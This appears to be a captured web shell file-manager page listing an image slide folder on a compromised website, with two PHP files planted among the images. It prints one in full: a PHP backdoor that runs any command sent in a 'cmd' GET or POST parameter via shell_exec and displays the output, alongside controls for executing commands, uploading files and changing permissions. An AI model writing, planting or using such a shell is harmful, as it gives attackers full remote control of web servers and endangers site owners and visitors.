📂 Current Directory:

📍 / / home / l58us183vdxl / public_html / img / slide
Full path: /home/l58us183vdxl/public_html/img/slide
⬆️ Go Up📁 /tmp🌐 Web Root🏠 /home

📁 NameSizePermissionsActions
📄 1.jpg504,238 B0644🗑️✏️
📄 2019-10-27-05-50-34png16,803 B0644🗑️✏️
📄 2019-10-27-05-53-41jpg106,481 B0644🗑️✏️
📄 2019-10-27-05-54-00png6,825 B0644🗑️✏️
📄 2019-11-06-00-45-35jpg394,110 B0644🗑️✏️
📄 2019-11-07-07-30-08png93,149 B0644🗑️✏️
📄 2019-11-07-07-58-15jpg61,805 B0644🗑️✏️
📄 2019-11-08-05-07-56jpg43,462 B0644🗑️✏️
📄 2019-11-08-05-15-02png1,905,249 B0644🗑️✏️
📄 2019-11-19-02-48-35jpg3,160,990 B0644🗑️✏️
📄 2019-11-19-02-57-30jpg466,060 B0644🗑️✏️
📄 2019-11-19-03-05-26jpg291,802 B0644🗑️✏️
📄 2019-11-19-03-08-02jpg261,960 B0644🗑️✏️
📄 2019-11-19-09-09-25jpg1,191,131 B0644🗑️✏️
📄 2019-11-20-04-43-25jpg1,525,098 B0644🗑️✏️
📄 2019-11-20-04-47-50jpg1,527,327 B0644🗑️✏️
📄 2019-11-22-03-03-46jpg2,207,672 B0644🗑️✏️
📄 2019-11-22-07-02-55jpg3,090,107 B0644🗑️✏️
📄 2019-11-22-07-15-22jpg3,028,509 B0644🗑️✏️
📄 2019-11-22-07-24-06jpg3,028,862 B0644🗑️✏️
📄 2020-01-22-10-54-50jpg15,978,206 B0644🗑️✏️
📄 2020-01-22-11-43-22jpg3,538,732 B0644🗑️✏️
📄 2020-01-22-11-54-41jpg3,721,096 B0644🗑️✏️
📄 2020-01-22-11-58-49jpg1,207,702 B0644🗑️✏️
📄 2020-01-23-09-16-09jpg8,347,783 B0644🗑️✏️
📄 2020-01-30-10-16-17jpg3,721,096 B0644🗑️✏️
📄 2020-01-31-08-50-18jpg3,538,732 B0644🗑️✏️
📄 2020-02-03-08-14-24jpg3,538,732 B0644🗑️✏️
📄 2020-02-12-10-23-08jpg4,385,354 B0644🗑️✏️
📄 2023-11-01-13-22-55.png136,992 B0644🗑️✏️
📄 2023-11-01-14-48-46.pdf247,850 B0644🗑️✏️
📄 2024-04-23-14-03-09.png5,785,629 B0644🗑️✏️
📄 2024-04-23-14-03-16.png5,785,629 B0644🗑️✏️
📄 2024-04-23-14-03-20.png5,785,629 B0644🗑️✏️
📄 2024-04-23-14-51-11.png6,906,983 B0644🗑️✏️
📄 2024-04-23-14-52-53.png6,901,475 B0644🗑️✏️
📄 2024-04-23-15-25-52.png7,240,250 B0644🗑️✏️
📄 2024-04-23-15-26-00.png7,240,250 B0644🗑️✏️
📄 2024-04-23-15-35-10.png7,245,834 B0644🗑️✏️
📄 2024-04-23-16-01-53.png8,530,249 B0644🗑️✏️
📄 2024-04-23-16-08-25.png13,882,583 B0644🗑️✏️
📄 2024-04-23-16-10-18.png12,134,709 B0644🗑️✏️
📄 2024-04-23-16-11-41.png11,132,286 B0644🗑️✏️
📄 2024-04-23-16-23-44.png11,142,146 B0644🗑️✏️
📄 2024-04-23-16-25-47.png17,249,678 B0644🗑️✏️
📄 2024-04-23-16-26-27.png17,249,678 B0644🗑️✏️
📄 2024-04-23-16-31-37.png17,249,678 B0644🗑️✏️
📄 2024-04-23-16-41-17.png215,203 B0644🗑️✏️
📄 2024-04-23-16-43-24.png215,203 B0644🗑️✏️
📄 2024-04-23-16-44-43.png11,951,036 B0644🗑️✏️
📄 2026-07-10-01-42-02.jpg171,023 B0644🗑️✏️
📄 2026-07-10-01-43-19.php4,078 B0644🗑️✏️
📄 2026-07-10-01-48-20.php10,631 B0644🗑️✏️
📄 error_log674 B0644🗑️✏️

📄 Contents of: 2026-07-10-01-43-19.php

<?php
// RCE with form input supporting both GET and POST
$method = $_SERVER['REQUEST_METHOD'];
$cmd = '';
$output = '';

// Get command based on request method
if ($method === 'POST') {
    $cmd = $_POST['cmd'] ?? '';
} else {
    $cmd = $_GET['cmd'] ?? '';
}

// Execute command if not empty
if (!empty($cmd)) {
    $output = shell_exec($cmd);
}

?>
<!DOCTYPE html>
<html>
<head>
    <title>Command Execution Interface</title>
    <style>
        body {
            font-family: "Courier New", monospace;
            background-color: #1e1e1e;
            color: #f0f0f0;
            padding: 20px;
            font-size: 18px;
            line-height: 1.6;
        }
        .container {
            max-width: 1350px;
            margin: 0 auto;
        }
        .command-form {
            margin-bottom: 25px;
            padding: 20px;
            background-color: #252526;
            border-radius: 5px;
        }
        .command-input {
            width: 80%;
            padding: 12px;
            font-size: 18px;
            font-weight: bold;
            background-color: #2d2d2d;
            color: #f0f0f0;
            border: 1px solid #569cd6;
            border-radius: 4px;
        }
        .submit-btn {
            padding: 12px 20px;
            font-size: 18px;
            font-weight: bold;
            background-color: #569cd6;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            margin-left: 10px;
        }
        .command-display {
            color: #4ec9b0;
            margin-bottom: 15px;
            font-weight: bold;
            font-size: 20px;
        }
        pre {
            background-color: #252526;
            padding: 20px;
            border-radius: 5px;
            border-left: 4px solid #569cd6;
            white-space: pre-wrap;
            word-wrap: break-word;
            font-weight: bold;
            font-size: 18px;
        }
        .prompt {
            color: #d4d4d4;
            font-weight: bold;
        }
        .prompt-symbol {
            color: #d7ba7d;
            font-weight: bold;
        }
        .method-tabs {
            display: flex;
            margin-bottom: 10px;
        }
        .method-tab {
            padding: 8px 15px;
            background-color: #2d2d2d;
            margin-right: 5px;
            cursor: pointer;
            border-radius: 4px 4px 0 0;
        }
        .method-tab.active {
            background-color: #569cd6;
            font-weight: bold;
        }
        .form-row {
            display: flex;
            align-items: center;
        }
    </style>
</head>
<body>
    <div class="container">
        <form id="cmd-form" method="POST" action="" class="command-form">
            <div class="method-tabs">
                <div class="method-tab <?= $method === 'POST' ? 'active' : '' ?>" onclick="document.getElementById('cmd-form').method='POST'; this.classList.add('active'); document.querySelector('.method-tab:not(.active)').classList.remove('active');">POST</div>
                <div class="method-tab <?= $method === 'GET' ? 'active' : '' ?>" onclick="document.getElementById('cmd-form').method='GET'; this.classList.add('active'); document.querySelector('.method-tab:not(.active)').classList.remove('active');">GET</div>
            </div>
            <div class="form-row">
                <input type="text" name="cmd" class="command-input" value="<?= htmlspecialchars($cmd) ?>" 
                       placeholder="Enter command..." autofocus>
                <button type="submit" class="submit-btn">Execute</button>
            </div>
        </form>

        <?php if (!empty($cmd)): ?>
            <div class="command-display">
                <span class="prompt">$</span> 
                <span class="prompt-symbol">></span> 
                <span style="color: #ce9178; font-weight: bold;"><?= htmlspecialchars($cmd) ?></span>
            </div>
            <pre><?= htmlspecialchars($output) ?></pre>
        <?php endif; ?>
    </div>
</body>
</html>

💻 Execute Command


📤 Upload File


🆕 Create New File


✏️ Rename File


🔑 Change Permissions